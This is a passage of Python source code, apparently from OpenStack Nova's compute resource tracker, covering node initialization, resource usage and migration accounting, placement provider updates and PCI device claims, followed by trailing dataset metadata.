numa_topology = self._get_migration_context_resource(
'numa_topology', instance, prefix=prefix)
usage = self._get_usage_dict(
flavor, instance, numa_topology=numa_topology)
self._drop_pci_devices(instance, nodename, prefix)
resources = self._get_migration_context_resource(
'resources', instance, prefix=prefix)
self._release_assigned_resources(resources)
self._update_usage(usage, nodename, sign=-1)
ctxt = context.elevated()
self._update(ctxt, self.compute_nodes[nodename])
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def update_usage(self, context, instance, nodename):
if self.disabled(nodename):
return
uuid = instance['uuid']
# don't update usage for this instance unless it submitted a resource
if uuid in self.tracked_instances:
self._update_usage_from_instance(context, instance, nodename)
self._update(context.elevated(), self.compute_nodes[nodename])
def disabled(self, nodename):
return (nodename not in self.compute_nodes or
not self.driver.node_is_available(nodename))
def _check_for_nodes_rebalance(self, context, resources, nodename):
if not self.driver.rebalances_nodes:
return False
# check if there is a compute node that already has the correct
# hypervisor_hostname. We can re-use that rather than create a
# new one and have to move existing placement allocations
cn_candidates = objects.ComputeNodeList.get_by_hypervisor(
context, nodename)
if len(cn_candidates) == 1:
cn = cn_candidates[0]
LOG.info("ComputeNode %(name)s moving from %(old)s to %(new)s",
{"name": nodename, "old": cn.host, "new": self.host})
cn.host = self.host
self.compute_nodes[nodename] = cn
self._copy_resources(cn, resources)
self._setup_pci_tracker(context, cn, resources)
self._update(context, cn)
return True
elif len(cn_candidates) > 1:
LOG.error(
"Found more than one ComputeNode for nodename %s. "
"Please clean up the orphaned ComputeNode records in your DB.",
nodename)
return False
def _init_compute_node(self, context, resources):
nodename = resources['hypervisor_hostname']
# if there is already a compute node just use resources
# to initialize
if nodename in self.compute_nodes:
cn = self.compute_nodes[nodename]
self._copy_resources(cn, resources)
self._setup_pci_tracker(context, cn, resources)
return False
# now try to get the compute node record from the
# database. If we get one we use resources to initialize
cn = self._get_compute_node(context, nodename)
if cn:
self.compute_nodes[nodename] = cn
self._copy_resources(cn, resources)
self._setup_pci_tracker(context, cn, resources)
return False
if self._check_for_nodes_rebalance(context, resources, nodename):
return False
# there was no local copy and none in the database
# so we need to create a new compute node. This needs
# to be initialized with resource values.
cn = objects.ComputeNode(context)
cn.host = self.host
self._copy_resources(cn, resources, initial=True)
cn.create()
# Only map the ComputeNode into compute_nodes if create() was OK
# because if create() fails, on the next run through here nodename
# would be in compute_nodes and we won't try to create again (because
self.compute_nodes[nodename] = cn
LOG.info('Compute node record created for '
'%(host)s:%(node)s with uuid: %(uuid)s',
{'host': self.host, 'node': nodename, 'uuid': cn.uuid})
self._setup_pci_tracker(context, cn, resources)
return True
def _setup_pci_tracker(self, context, compute_node, resources):
if not self.pci_tracker:
self.pci_tracker = pci_manager.PciDevTracker(context, compute_node)
if 'pci_passthrough_devices' in resources:
dev_json = resources.pop('pci_passthrough_devices')
self.pci_tracker.update_devices_from_hypervisor_resources(
dev_json)
dev_pools_obj = self.pci_tracker.stats.to_device_pools_obj()
compute_node.pci_device_pools = dev_pools_obj
def _copy_resources(self, compute_node, resources, initial=False):
nodename = resources['hypervisor_hostname']
stats = self.stats[nodename]
prev_failed_builds = stats.get('failed_builds', 0)
stats.clear()
stats['failed_builds'] = prev_failed_builds
stats.digest_stats(resources.get('stats'))
compute_node.stats = stats
# ComputeNode.cpu_allocation_ratio of 16.0. We want to avoid
# resetting the ComputeNode fields to None because that will make
# the _resource_change method think something changed when really it
# didn't.
for res in ('cpu', 'disk', 'ram'):
attr = '%s_allocation_ratio' % res
if initial:
conf_alloc_ratio = getattr(CONF, 'initial_%s' % attr)
else:
conf_alloc_ratio = getattr(self, attr)
if conf_alloc_ratio not in (0.0, None):
setattr(compute_node, attr, conf_alloc_ratio)
compute_node.update_from_virt_driver(resources)
def remove_node(self, nodename):
self.stats.pop(nodename, None)
self.compute_nodes.pop(nodename, None)
self.old_resources.pop(nodename, None)
def _get_host_metrics(self, context, nodename):
metrics = objects.MonitorMetricList()
metrics_info = {}
for monitor in self.monitors:
try:
monitor.populate_metrics(metrics)
except NotImplementedError:
LOG.debug("The compute driver doesn't support host "
"metrics for %(mon)s", {'mon': monitor})
except Exception as exc:
LOG.warning("Cannot get the metrics from %(mon)s; "
"error: %(exc)s",
{'mon': monitor, 'exc': exc})
# TODO(jaypipes): Remove this when compute_node.metrics doesn't need
metric_list = metrics.to_list()
if len(metric_list):
metrics_info['nodename'] = nodename
metrics_info['metrics'] = metric_list
metrics_info['host'] = self.host
metrics_info['host_ip'] = CONF.my_ip
notifier = rpc.get_notifier(service='compute', host=nodename)
notifier.info(context, 'compute.metrics.update', metrics_info)
compute_utils.notify_about_metrics_update(
context, self.host, CONF.my_ip, nodename, metrics)
return metric_list
def update_available_resource(self, context, nodename, startup=False):
LOG.debug("Auditing locally available compute resources for "
"%(host)s (node: %(node)s)",
{'node': nodename,
'host': self.host})
resources = self.driver.get_available_resource(nodename)
resources['host_ip'] = CONF.my_ip
if "cpu_info" not in resources or resources["cpu_info"] is None:
resources["cpu_info"] = ''
self._verify_resources(resources)
self._report_hypervisor_resource_view(resources)
self._update_available_resource(context, resources, startup=startup)
def _pair_instances_to_migrations(self, migrations, instance_by_uuid):
for migration in migrations:
try:
migration.instance = instance_by_uuid[migration.instance_uuid]
except KeyError:
# let the code either fail or lazy-load the instance later
# which is what happened before we added this optimization.
# NOTE(tdurakov) this situation is possible for resize/cold
# migration when migration is finished but haven't yet
LOG.debug('Migration for instance %(uuid)s refers to '
'another host\'s instance!',
{'uuid': migration.instance_uuid})
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def _update_available_resource(self, context, resources, startup=False):
# initialize the compute node object, creating it
# if it does not already exist.
is_new_compute_node = self._init_compute_node(context, resources)
nodename = resources['hypervisor_hostname']
# if we could not init the compute node the tracker will be
# disabled and we should quit now
if self.disabled(nodename):
return
# Grab all instances assigned to this node:
instances = objects.InstanceList.get_by_host_and_node(
context, self.host, nodename,
expected_attrs=['system_metadata',
'numa_topology',
'flavor', 'migration_context',
'resources'])
# Grab all in-progress migrations and error migrations:
migrations = objects.MigrationList.get_in_progress_and_error(
context, self.host, nodename)
# Check for tracked instances with in-progress, incoming, but not
# finished migrations. For those instance the migration context
# is not applied yet (it will be during finish_resize when the
# migration goes to finished state). We need to manually and
# temporary apply the migration context here when the resource usage is
# updated. See bug 1953359 for more details.
instance_by_uuid = {instance.uuid: instance for instance in instances}
for migration in migrations:
if (
migration.instance_uuid in instance_by_uuid and
migration.dest_compute == self.host and
migration.dest_node == nodename
):
# we does not check for the 'post-migrating' migration status
# as applying the migration context for an instance already
# in finished migration status is a no-op anyhow.
instance = instance_by_uuid[migration.instance_uuid]
LOG.debug(
'Applying migration context for instance %s as it has an '
'incoming, in-progress migration %s. '
'Migration status is %s',
migration.instance_uuid, migration.uuid, migration.status
)
# It is OK not to revert the migration context at the end of
# the periodic as the instance is not saved during the periodic
instance.apply_migration_context()
# Now calculate usage based on instance utilization:
instance_by_uuid = self._update_usage_from_instances(
context, instances, nodename)
self._pair_instances_to_migrations(migrations, instance_by_uuid)
self._update_usage_from_migrations(context, migrations, nodename)
# A new compute node means there won't be a resource provider yet since
if not is_new_compute_node:
self._remove_deleted_instances_allocations(
context, self.compute_nodes[nodename], migrations,
instance_by_uuid)
cn = self.compute_nodes[nodename]
self.pci_tracker.clean_usage(instances, migrations)
dev_pools_obj = self.pci_tracker.stats.to_device_pools_obj()
cn.pci_device_pools = dev_pools_obj
self._report_final_resource_view(nodename)
metrics = self._get_host_metrics(context, nodename)
cn.metrics = jsonutils.dumps(metrics)
self._populate_assigned_resources(context, instance_by_uuid)
self._update(context, cn, startup=startup)
LOG.debug('Compute_service record updated for %(host)s:%(node)s',
{'host': self.host, 'node': nodename})
if startup:
self._check_resources(context)
def _get_compute_node(self, context, nodename):
try:
return objects.ComputeNode.get_by_host_and_nodename(
context, self.host, nodename)
except exception.NotFound:
LOG.warning("No compute node record for %(host)s:%(node)s",
{'host': self.host, 'node': nodename})
def _report_hypervisor_resource_view(self, resources):
nodename = resources['hypervisor_hostname']
free_ram_mb = resources['memory_mb'] - resources['memory_mb_used']
free_disk_gb = resources['local_gb'] - resources['local_gb_used']
vcpus = resources['vcpus']
if vcpus:
free_vcpus = vcpus - resources['vcpus_used']
else:
free_vcpus = 'unknown'
pci_devices = resources.get('pci_passthrough_devices')
LOG.debug("Hypervisor/Node resource view: "
"name=%(node)s "
"free_ram=%(free_ram)sMB "
"free_disk=%(free_disk)sGB "
"free_vcpus=%(free_vcpus)s "
"pci_devices=%(pci_devices)s",
{'node': nodename,
'free_ram': free_ram_mb,
'free_disk': free_disk_gb,
'free_vcpus': free_vcpus,
'pci_devices': pci_devices})
def _report_final_resource_view(self, nodename):
cn = self.compute_nodes[nodename]
vcpus = cn.vcpus
if vcpus:
tcpu = vcpus
ucpu = cn.vcpus_used
LOG.debug("Total usable vcpus: %(tcpu)s, "
"total allocated vcpus: %(ucpu)s",
{'tcpu': vcpus,
'ucpu': ucpu})
else:
tcpu = 0
ucpu = 0
pci_stats = (list(cn.pci_device_pools) if
cn.pci_device_pools else [])
LOG.debug("Final resource view: "
"name=%(node)s "
"phys_ram=%(phys_ram)sMB "
"used_ram=%(used_ram)sMB "
"phys_disk=%(phys_disk)sGB "
"used_disk=%(used_disk)sGB "
"total_vcpus=%(total_vcpus)s "
"used_vcpus=%(used_vcpus)s "
"pci_stats=%(pci_stats)s",
{'node': nodename,
'phys_ram': cn.memory_mb,
'used_ram': cn.memory_mb_used,
'phys_disk': cn.local_gb,
'used_disk': cn.local_gb_used,
'total_vcpus': tcpu,
'used_vcpus': ucpu,
'pci_stats': pci_stats})
def _resource_change(self, compute_node):
nodename = compute_node.hypervisor_hostname
old_compute = self.old_resources[nodename]
if not obj_base.obj_equal_prims(
compute_node, old_compute, ['updated_at']):
self.old_resources[nodename] = copy.deepcopy(compute_node)
return True
return False
def _sync_compute_service_disabled_trait(self, context, traits):
trait = os_traits.COMPUTE_STATUS_DISABLED
try:
service = objects.Service.get_by_compute_host(context, self.host)
if service.disabled:
traits.add(trait)
else:
traits.discard(trait)
except exception.NotFound:
LOG.error('Unable to find services table record for nova-compute '
'host %s', self.host)
def _get_traits(self, context, nodename, provider_tree):
traits = provider_tree.data(nodename).traits
# Now get the driver's capabilities and add any supported
for trait, supported in self.driver.capabilities_as_traits().items():
if supported:
traits.add(trait)
elif trait in traits:
traits.remove(trait)
traits.add(os_traits.COMPUTE_NODE)
self._sync_compute_service_disabled_trait(context, traits)
return list(traits)
@retrying.retry(stop_max_attempt_number=4,
retry_on_exception=lambda e: isinstance(
e, exception.ResourceProviderUpdateConflict))
def _update_to_placement(self, context, compute_node, startup):
# there is no resource change for compute_node, we need proceed
# to get inventory and use report client interfaces to update
# inventory to placement. It's report client's responsibility to
# ensure the update request to placement only happens when inventory
# is changed.
nodename = compute_node.hypervisor_hostname
# Persist the stats to the Scheduler
# Retrieve the provider tree associated with this compute node. If
# it doesn't exist yet, this will create it with a (single, root)
prov_tree = self.reportclient.get_provider_tree_and_ensure_root(
context, compute_node.uuid, name=compute_node.hypervisor_hostname)
allocs = None
try:
self.driver.update_provider_tree(prov_tree, nodename)
except exception.ReshapeNeeded:
if not startup:
# it up; the compute manager will treat it specially.
raise
LOG.info("Performing resource provider inventory and "
"allocation data migration during compute service "
"startup or fast-forward upgrade.")
allocs = self.reportclient.get_allocations_for_provider_tree(
context, nodename)
self.driver.update_provider_tree(prov_tree, nodename,
allocations=allocs)
# Inject driver capabilities traits into the provider
# tree. We need to determine the traits that the virt
# driver owns - so those that come from the tree itself
# (via the virt driver) plus the compute capabilities
# traits, and then merge those with the traits set
# externally that the driver does not own - and remove any
# set on the provider externally that the virt owns but
# aren't in the current list of supported traits. For
# trait at t1 and then at t2 it's not, so we need to
# was set externally on the provider.
# We also want to sync the COMPUTE_STATUS_DISABLED trait based
# on the related nova-compute service's disabled status.
traits = self._get_traits(
context, nodename, provider_tree=prov_tree)
prov_tree.update_traits(nodename, traits)
self.provider_tree = prov_tree
self._merge_provider_configs(self.provider_configs, prov_tree)
self.reportclient.update_from_provider_tree(context, prov_tree,
allocations=allocs)
def _update(self, context, compute_node, startup=False):
# _resource_change will update self.old_resources if it detects changes
# but we want to restore those if compute_node.save() fails.
nodename = compute_node.hypervisor_hostname
old_compute = self.old_resources[nodename]
if self._resource_change(compute_node):
# If the compute_node's resource changed, update to DB. Note that
try:
compute_node.save()
except Exception:
with excutils.save_and_reraise_exception(logger=LOG):
self.old_resources[nodename] = old_compute
self._update_to_placement(context, compute_node, startup)
if self.pci_tracker:
self.pci_tracker.save(context)
def _update_usage(self, usage, nodename, sign=1):
# except 'Aggregate(Core|Ram|Disk)Filter', the 'os-hypervisors' API,
# and perhaps some out-of-tree filters. Once the in-tree stuff is
# removed or updated to use information from placement, we can think
# about dropping the fields from the 'ComputeNode' object entirely
mem_usage = usage['memory_mb']
disk_usage = usage.get('root_gb', 0)
vcpus_usage = usage.get('vcpus', 0)
cn = self.compute_nodes[nodename]
cn.memory_mb_used += sign * mem_usage
cn.local_gb_used += sign * disk_usage
cn.local_gb_used += sign * usage.get('ephemeral_gb', 0)
cn.local_gb_used += sign * usage.get('swap', 0) / 1024
cn.vcpus_used += sign * vcpus_usage
# free ram and disk may be negative, depending on policy:
cn.free_ram_mb = cn.memory_mb - cn.memory_mb_used
cn.free_disk_gb = cn.local_gb - cn.local_gb_used
stats = self.stats[nodename]
cn.running_vms = stats.num_instances
# calculate the NUMA usage, assuming the instance is actually using
# NUMA, of course
if cn.numa_topology and usage.get('numa_topology'):
instance_numa_topology = usage.get('numa_topology')
# the ComputeNode.numa_topology field is a StringField, so
# deserialize
host_numa_topology = objects.NUMATopology.obj_from_db_obj(
cn.numa_topology)
free = sign == -1
# ...and reserialize once we save it back
cn.numa_topology = hardware.numa_usage_from_instance_numa(
host_numa_topology, instance_numa_topology, free)._to_json()
def _get_migration_context_resource(self, resource, instance,
prefix='new_'):
migration_context = instance.migration_context
resource = prefix + resource
if migration_context and resource in migration_context:
return getattr(migration_context, resource)
return None
def _update_usage_from_migration(self, context, instance, migration,
nodename):
uuid = migration.instance_uuid
LOG.info("Updating resource usage from migration %s", migration.uuid,
instance_uuid=uuid)
incoming = (migration.dest_compute == self.host and
migration.dest_node == nodename)
outbound = (migration.source_compute == self.host and
migration.source_node == nodename)
same_node = (incoming and outbound)
tracked = uuid in self.tracked_instances
itype = None
numa_topology = None
sign = 0
if same_node:
# Same node resize. Record usage for the 'new_' resources. This
# is executed on resize_claim().
if instance['instance_type_id'] == migration.old_instance_type_id:
itype = self._get_flavor(instance, 'new_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance)
# Allocate pci device(s) for the instance.
sign = 1
else:
# The instance is already set to the new flavor (this is done
# by the compute manager on finish_resize()), hold space for a
# possible revert to the 'old_' resources.
# NOTE(lbeliveau): When the periodic audit timer gets
# triggered, the compute usage gets reset. The usage for an
# instance that is migrated to the new flavor but not yet
# confirmed/reverted will first get accounted for by
# _update_usage_from_instances(). This method will then be
# called, and we need to account for the '_old' resources
# (just in case).
itype = self._get_flavor(instance, 'old_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance, prefix='old_')
elif incoming and not tracked:
# instance has not yet migrated here:
itype = self._get_flavor(instance, 'new_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance)
# Allocate pci device(s) for the instance.
sign = 1
LOG.debug('Starting to track incoming migration %s with flavor %s',
migration.uuid, itype.flavorid, instance=instance)
elif outbound and not tracked:
# instance migrated, but record usage for a possible revert:
itype = self._get_flavor(instance, 'old_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance, prefix='old_')
# We could be racing with confirm_resize setting the
# instance.old_flavor field to None before the migration status
# is "confirmed" so if we did not find the flavor in the outgoing
# resized instance we won't track it.
if itype:
LOG.debug('Starting to track outgoing migration %s with '
'flavor %s', migration.uuid, itype.flavorid,
instance=instance)
if itype:
cn = self.compute_nodes[nodename]
usage = self._get_usage_dict(
itype, instance, numa_topology=numa_topology)
if self.pci_tracker and sign:
self.pci_tracker.update_pci_for_instance(
context, instance, sign=sign)
self._update_usage(usage, nodename)
if self.pci_tracker:
obj = self.pci_tracker.stats.to_device_pools_obj()
cn.pci_device_pools = obj
else:
obj = objects.PciDevicePoolList()
cn.pci_device_pools = obj
self.tracked_migrations[uuid] = migration
def _update_usage_from_migrations(self, context, migrations, nodename):
filtered = {}
instances = {}
self.tracked_migrations.clear()
for migration in migrations:
uuid = migration.instance_uuid
try:
if uuid not in instances:
migration._context = context.elevated(read_deleted='yes')
instances[uuid] = migration.instance
except exception.InstanceNotFound as e:
LOG.debug('Migration instance not found: %s', e)
continue
if (not _instance_in_resize_state(instances[uuid]) and not
_instance_is_live_migrating(instances[uuid])):
LOG.debug('Skipping migration as instance is neither '
'resizing nor live-migrating.', instance_uuid=uuid)
continue
other_migration = filtered.get(uuid, None)
if other_migration:
om = other_migration
other_time = om.updated_at or om.created_at
migration_time = migration.updated_at or migration.created_at
if migration_time > other_time:
filtered[uuid] = migration
else:
filtered[uuid] = migration
for migration in filtered.values():
instance = instances[migration.instance_uuid]
# instance migration id.
# This can happen if we have a stale migration record.
# We want to proceed if instance.migration_context is None
if (instance.migration_context is not None and
instance.migration_context.migration_id != migration.id):
LOG.info("Current instance migration %(im)s doesn't match "
"migration %(m)s, marking migration as error. "
"This can occur if a previous migration for this "
"instance did not complete.",
{'im': instance.migration_context.migration_id,
'm': migration.id})
migration.status = "error"
migration.save()
continue
try:
self._update_usage_from_migration(context, instance, migration,
nodename)
except exception.FlavorNotFound:
LOG.warning("Flavor could not be found, skipping migration.",
instance_uuid=instance.uuid)
continue
def _update_usage_from_instance(self, context, instance, nodename,
is_removed=False):
uuid = instance['uuid']
is_new_instance = uuid not in self.tracked_instances
is_removed_instance = not is_new_instance and (is_removed or
instance['vm_state'] in vm_states.ALLOW_RESOURCE_REMOVAL)
if is_new_instance:
self.tracked_instances.add(uuid)
sign = 1
if is_removed_instance:
self.tracked_instances.remove(uuid)
self._release_assigned_resources(instance.resources)
sign = -1
cn = self.compute_nodes[nodename]
stats = self.stats[nodename]
stats.update_stats_for_instance(instance, is_removed_instance)
cn.stats = stats
if is_new_instance or is_removed_instance:
if self.pci_tracker:
self.pci_tracker.update_pci_for_instance(context,
instance,
sign=sign)
# new instance, update compute node resource usage:
self._update_usage(self._get_usage_dict(instance, instance),
nodename, sign=sign)
# Stop tracking removed instances in the is_bfv cache. This needs to
# happen *after* calling _get_usage_dict() since that relies on the
# is_bfv cache.
if is_removed_instance and uuid in self.is_bfv:
del self.is_bfv[uuid]
cn.current_workload = stats.calculate_workload()
if self.pci_tracker:
obj = self.pci_tracker.stats.to_device_pools_obj()
cn.pci_device_pools = obj
else:
cn.pci_device_pools = objects.PciDevicePoolList()
def _update_usage_from_instances(self, context, instances, nodename):
self.tracked_instances.clear()
cn = self.compute_nodes[nodename]
# set some initial values, reserve room for host/hypervisor:
cn.local_gb_used = CONF.reserved_host_disk_mb / 1024
cn.memory_mb_used = CONF.reserved_host_memory_mb
cn.vcpus_used = CONF.reserved_host_cpus
cn.free_ram_mb = (cn.memory_mb - cn.memory_mb_used)
cn.free_disk_gb = (cn.local_gb - cn.local_gb_used)
cn.current_workload = 0
cn.running_vms = 0
instance_by_uuid = {}
for instance in instances:
if instance.vm_state not in vm_states.ALLOW_RESOURCE_REMOVAL:
self._update_usage_from_instance(context, instance, nodename)
instance_by_uuid[instance.uuid] = instance
return instance_by_uuid
def _remove_deleted_instances_allocations(self, context, cn,
migrations, instance_by_uuid):
migration_uuids = [migration.uuid for migration in migrations
if 'uuid' in migration]
# NOTE(jaypipes): All of this code sucks. It's basically dealing with
# happen according to the normal flow of events where the scheduler
# always creates allocations for an instance
try:
# pai: report.ProviderAllocInfo namedtuple
pai = self.reportclient.get_allocations_for_resource_provider(
context, cn.uuid)
except (exception.ResourceProviderAllocationRetrievalFailed,
ks_exc.ClientException) as e:
LOG.error("Skipping removal of allocations for deleted instances: "
"%s", e)
return
allocations = pai.allocations
if not allocations:
# The main loop below would short-circuit anyway, but this saves us
# the (potentially expensive) context.elevated construction below.
return
read_deleted_context = context.elevated(read_deleted='yes')
for consumer_uuid, alloc in allocations.items():
if consumer_uuid in self.tracked_instances:
LOG.debug("Instance %s actively managed on this compute host "
"and has allocations in placement: %s.",
consumer_uuid, alloc)
continue
if consumer_uuid in migration_uuids:
LOG.debug("Migration %s is active on this compute host "
"and has allocations in placement: %s.",
consumer_uuid, alloc)
continue
# We know these are instances now, so proceed
instance_uuid = consumer_uuid
instance = instance_by_uuid.get(instance_uuid)
if not instance:
try:
instance = objects.Instance.get_by_uuid(
read_deleted_context, consumer_uuid,
expected_attrs=[])
except exception.InstanceNotFound:
# The instance isn't even in the database. Either the
# racing with the creation in the cell database, or the
# instance was deleted and fully archived before we got a
# chance to run this. The former is far more likely than
# the latter. Avoid deleting allocations for a building
# instance here.
LOG.info("Instance %(uuid)s has allocations against this "
"compute host but is not found in the database.",
{'uuid': instance_uuid},
exc_info=False)
continue
# NOTE(mriedem): A cross-cell migration will work with instance
# records across two cells once the migration is confirmed/reverted
# one of them will be deleted but the instance still exists in the
# other cell. Before the instance is destroyed from the old cell
# though it is marked hidden=True so if we find a deleted hidden
# instance with allocations against this compute node we just
# ignore it since the migration operation will handle cleaning up
# those allocations.
if instance.deleted and not instance.hidden:
# The instance is gone, so we definitely want to remove
# allocations associated with it.
LOG.debug("Instance %s has been deleted (perhaps locally). "
"Deleting allocations that remained for this "
"instance against this compute host: %s.",
instance_uuid, alloc)
# We don't force delete the allocation in this case because if
# update_available_resource periodic run.
self.reportclient.delete_allocation_for_instance(context,
instance_uuid,
force=False)
continue
if not instance.host:
# Allocations related to instances being scheduled should not
# be deleted if we already wrote the allocation previously.
LOG.debug("Instance %s has been scheduled to this compute "
"host, the scheduler has made an allocation "
"against this compute node but the instance has "
"yet to start. Skipping heal of allocation: %s.",
instance_uuid, alloc)
continue
if (instance.host == cn.host and
instance.node == cn.hypervisor_hostname):
# The instance is supposed to be on this compute host but is
# not in the list of actively managed instances. This could be
# because we are racing with an instance_claim call during
# initial build or unshelve where the instance host/node is set
# before the instance is added to tracked_instances. If the
# task_state is set, then consider things in motion and log at
# debug level instead of warning.
if instance.task_state:
LOG.debug('Instance with task_state "%s" is not being '
'actively managed by this compute host but has '
'allocations referencing this compute node '
'(%s): %s. Skipping heal of allocations during '
'the task state transition.',
instance.task_state, cn.uuid, alloc,
instance=instance)
else:
LOG.warning("Instance %s is not being actively managed by "
"this compute host but has allocations "
"referencing this compute host: %s. Skipping "
"heal of allocation because we do not know "
"what to do.", instance_uuid, alloc)
continue
if instance.host != cn.host:
# The instance has been moved to another host either via a
# migration, evacuation or unshelve in between the time when we
# ran InstanceList.get_by_host_and_node(), added those
# instances to RT.tracked_instances and the above
# Instance.get_by_uuid() call. We SHOULD attempt to remove any
# allocations that reference this compute host if the VM is in
# a stable terminal state (i.e. it isn't in a state of waiting
# situation here for information but don't attempt to delete or
LOG.warning("Instance %s has been moved to another host "
"%s(%s). There are allocations remaining against "
"the source host that might need to be removed: "
"%s.",
instance_uuid, instance.host, instance.node, alloc)
def delete_allocation_for_evacuated_instance(self, context, instance, node,
node_type='source'):
cn_uuid = self.compute_nodes[node].uuid
if not self.reportclient.remove_provider_tree_from_instance_allocation(
context, instance.uuid, cn_uuid):
LOG.error("Failed to clean allocation of evacuated "
"instance on the %s node %s",
node_type, cn_uuid, instance=instance)
def delete_allocation_for_shelve_offloaded_instance(self, context,
instance):
self.reportclient.delete_allocation_for_instance(
context, instance.uuid, force=True)
def _verify_resources(self, resources):
resource_keys = ["vcpus", "memory_mb", "local_gb", "cpu_info",
"vcpus_used", "memory_mb_used", "local_gb_used",
"numa_topology"]
missing_keys = [k for k in resource_keys if k not in resources]
if missing_keys:
reason = _("Missing keys: %s") % missing_keys
raise exception.InvalidInput(reason=reason)
def _get_flavor(self, instance, prefix, migration):
if migration.is_resize:
return getattr(instance, '%sflavor' % prefix)
return instance.flavor
def _get_usage_dict(self, object_or_dict, instance, **updates):
def _is_bfv():
if instance.uuid in self.is_bfv:
is_bfv = self.is_bfv[instance.uuid]
else:
is_bfv = compute_utils.is_volume_backed_instance(
instance._context, instance)
self.is_bfv[instance.uuid] = is_bfv
return is_bfv
usage = {}
if isinstance(object_or_dict, objects.Instance):
is_bfv = _is_bfv()
usage = {'memory_mb': object_or_dict.flavor.memory_mb,
'swap': object_or_dict.flavor.swap,
'vcpus': object_or_dict.flavor.vcpus,
'root_gb': (0 if is_bfv else
object_or_dict.flavor.root_gb),
'ephemeral_gb': object_or_dict.flavor.ephemeral_gb,
'numa_topology': object_or_dict.numa_topology}
elif isinstance(object_or_dict, objects.Flavor):
usage = obj_base.obj_to_primitive(object_or_dict)
if _is_bfv():
usage['root_gb'] = 0
else:
usage.update(object_or_dict)
for key in ('numa_topology',):
if key in updates:
usage[key] = updates[key]
return usage
def _merge_provider_configs(self, provider_configs, provider_tree):
processed_providers = {}
provider_custom_traits = {}
for uuid_or_name, provider_data in provider_configs.items():
additional_traits = provider_data.get(
"traits", {}).get("additional", [])
additional_inventories = provider_data.get(
"inventories", {}).get("additional", [])
source_file_name = provider_data['__source_file']
providers_to_update = self._get_providers_to_update(
uuid_or_name, provider_tree, source_file_name)
for provider in providers_to_update:
if uuid_or_name == "$COMPUTE_NODE":
if any(_pid in provider_configs
for _pid in [provider.name, provider.uuid]):
continue
current_uuid = provider.uuid
if current_uuid in processed_providers:
raise ValueError(_(
"Provider config '%(source_file_name)s' conflicts "
"with provider config '%(processed_providers)s'. "
"The same provider is specified using both name "
"'%(uuid_or_name)s' and uuid '%(current_uuid)s'.") % {
'source_file_name': source_file_name,
'processed_providers':
processed_providers[current_uuid],
'uuid_or_name': uuid_or_name,
'current_uuid': current_uuid
}
)
if current_uuid not in provider_custom_traits:
provider_custom_traits[current_uuid] = {
trait for trait in provider.traits
if trait.startswith('CUSTOM')
}
existing_custom_traits = provider_custom_traits[current_uuid]
if additional_traits:
intersect = set(provider.traits) & set(additional_traits)
intersect -= existing_custom_traits
if intersect:
invalid = ','.join(intersect)
raise ValueError(_(
"Provider config '%(source_file_name)s' attempts "
"to define a trait that is owned by the "
"virt driver or specified via the placment api. "
"Invalid traits '%(invalid)s' must be removed "
"from '%(source_file_name)s'.") % {
'source_file_name': source_file_name,
'invalid': invalid
}
)
provider_tree.add_traits(provider.uuid, *additional_traits)
if additional_inventories:
merged_inventory = provider.inventory
intersect = (merged_inventory.keys() &
{rc for inv_dict in additional_inventories
for rc in inv_dict})
if intersect:
raise ValueError(_(
"Provider config '%(source_file_name)s' attempts "
"to define an inventory that is owned by the "
"virt driver. Invalid inventories '%(invalid)s' "
"must be removed from '%(source_file_name)s'.") % {
'source_file_name': source_file_name,
'invalid': ','.join(intersect)
}
)
for inventory in additional_inventories:
merged_inventory.update(inventory)
provider_tree.update_inventory(
provider.uuid, merged_inventory)
processed_providers[current_uuid] = source_file_name
def _get_providers_to_update(self, uuid_or_name, provider_tree,
source_file):
if uuid_or_name == "$COMPUTE_NODE":
return [root.data() for root in provider_tree.roots
if os_traits.COMPUTE_NODE in root.traits]
try:
providers_to_update = [provider_tree.data(uuid_or_name)]
self.absent_providers.discard(uuid_or_name)
except ValueError:
providers_to_update = []
if uuid_or_name not in self.absent_providers:
LOG.warning(
"Provider '%(uuid_or_name)s' specified in provider "
"config file '%(source_file)s' does not exist in the "
"ProviderTree and will be ignored.",
{"uuid_or_name": uuid_or_name,
"source_file": source_file})
self.absent_providers.add(uuid_or_name)
return providers_to_update
def build_failed(self, nodename):
self.stats[nodename].build_failed()
def build_succeeded(self, nodename):
self.stats[nodename].build_succeeded()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def claim_pci_devices(self, context, pci_requests, instance_numa_topology):
result = self.pci_tracker.claim_instance(
context, pci_requests, instance_numa_topology)
self.pci_tracker.save(context)
return result
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def unclaim_pci_devices(self, context, pci_device, instance):
self.pci_tracker.free_device(pci_device, instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def allocate_pci_devices_for_instance(self, context, instance):
self.pci_tracker.allocate_instance(instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def free_pci_device_allocations_for_instance(self, context, instance):
self.pci_tracker.free_instance_allocations(context, instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def free_pci_device_claims_for_instance(self, context, instance):
self.pci_tracker.free_instance_claims(context, instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def finish_evacuation(self, instance, node, migration):
instance.apply_migration_context()
instance.host = self.host
instance.node = node
instance.save()
instance.drop_migration_context()
if migration:
migration.status = 'done'
migration.save()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def clean_compute_node_cache(self, compute_nodes_in_db):
compute_nodes_in_db_nodenames = {cn.hypervisor_hostname
for cn in compute_nodes_in_db}
stale_cns = set(self.compute_nodes) - compute_nodes_in_db_nodenames
for stale_cn in stale_cns:
self.remove_node(stale_cn)
self.reportclient.invalidate_resource_provider(stale_cn)
| true
| true
|
1c492c4e9a84606e0f299dd1ac558d6f7ef71d04
| 2,113
|
py
|
Python
|
system-tests/headbanger.py
|
jameszha/ARENA-py
|
209d93e9b91ba1d0c306b307e6dcb8411aada5b3
|
[
"BSD-3-Clause"
] | null | null | null |
